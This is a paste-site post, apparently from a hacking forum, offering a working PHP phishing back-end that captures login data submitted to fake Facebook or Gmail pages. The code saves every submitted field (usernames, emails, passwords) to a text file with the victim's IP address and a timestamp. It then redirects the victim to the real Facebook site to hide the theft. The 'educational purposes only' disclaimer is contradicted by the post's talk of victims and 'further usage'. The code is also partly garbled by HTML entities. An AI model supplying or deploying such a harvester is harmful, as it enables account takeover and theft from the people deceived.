Phishing php script


SUBMITTED BY: Guest

DATE: Sept. 23, 2013, 7:53 p.m.

FORMAT: Text only

SIZE: 3.1 kB

HITS: 1227

  1. Phishing php script
  2. *Note: This is not a tutorial on how to use phishing to get emails and passwords. Only for educational purposes!!
  3. Hi guys, i was gone for a while ,but, you know what people say..: Once a programmer, always a programmer
  4. Today I wanna help those who so desperately try to find (like I did when I started ) the PHP script that recieves the POST method data(email/username and pass) from Facebook or Gmail(4example) and save them in a .txt file.
  5. I remember that there is such script on the net but it is too simple... So this is my version of that PHP script with a few more features:
  6. 1. Recieves POST and GET method data and save them.
  7. 2. Also saves in the .txt file the server date and time so that you know when it was added.
  8. 3. Also gets and saves the victims IP adress for further usage.
  9. PHP Code: SELECT ALL
  10. <?php/*#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!Credits:&nbsp;ReTi0n&nbsp;4&nbsp;HackCommunity.COMDate&nbsp;&nbsp;&nbsp;:&nbsp;8/9/13#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!*///Location:&nbsp;The&nbsp;location&nbsp;where&nbsp;the&nbsp;user&nbsp;will&nbsp;be&nbsp;redirected&nbsp;after&nbsp;the&nbsp;script&nbsp;executes&nbsp;the&nbsp;commands.&nbsp;You&nbsp;can&nbsp;change&nbsp;it.header("Location:&nbsp;https://www.facebook.com/profile.php&nbsp;");//It&nbsp;will&nbsp;create&nbsp;the&nbsp;file&nbsp;"logs1.txt"&nbsp;(if&nbsp;not&nbsp;already&nbsp;created)&nbsp;and&nbsp;will&nbsp;save&nbsp;the&nbsp;POST&nbsp;or&nbsp;GET&nbsp;method&nbsp;data(the&nbsp;username/email&nbsp;and&nbsp;pass).&nbsp;You&nbsp;can&nbsp;change&nbsp;the&nbsp;filename.$handle&nbsp;=&nbsp;fopen("logs1.txt",&nbsp;"a");fwrite($handle,&nbsp;"\r\n");foreach($_POST&nbsp;as&nbsp;$variable&nbsp;=>&nbsp;$value)&nbsp;{fwrite($handle,&nbsp;$variable);fwrite($handle,&nbsp;"=");fwrite($handle,&nbsp;$value);fwrite($handle,&nbsp;"\r\n");}fwrite($handle,&nbsp;"\r\n");fclose($handle);//2ρος&nbsp;γυρος.//This&nbsp;filename&nbsp;must&nbsp;be&nbsp;the&nbsp;same&nbsp;with&nbsp;the&nbsp;one&nbsp;above.$myFile&nbsp;=&nbsp;"logs1.txt";$fh&nbsp;=&nbsp;fopen($myFile,&nbsp;'a');//Gets&nbsp;remote&nbsp;ip&nbsp;adress$ip2&nbsp;=&nbsp;$_SERVER['REMOTE_ADDR'];$ip&nbsp;=&nbsp;"IP="&nbsp;.&nbsp;$_SERVER['REMOTE_ADDR']&nbsp;.&nbsp;"\n"&nbsp;;$stringData&nbsp;=&nbsp;"------------------------------------------\n";$date&nbsp;=&nbsp;"Date="&nbsp;.&nbsp;date('Y-m-d&nbsp;H:iConfused');//write&nbsp;in&nbsp;filefwrite($fh,&nbsp;$ip);fwrite($fh,&nbsp;"\r\n");fwrite($fh,&nbsp;$date);fwrite($fh,&nbsp;"\r\n");fwrite($fh,&nbsp;$stringData);fwrite($fh,&nbsp;"\r\n");fwrite($fh,&nbsp;"\r\n");fclose($fh);exit;/*#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!Credits:&nbsp;ReTi0n&nbsp;4&nbsp;HackCommunity.COMDate&nbsp;&nbsp;&nbsp;:&nbsp;8/9/13#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!#!*/?>
  11. This is an example of how its gonna look if you use it with multiple victims. IP is 127.0.0.1 'cause I used it in local network.
  12. As you can see its pretty simple and everythink is organised.

comments powered by Disqus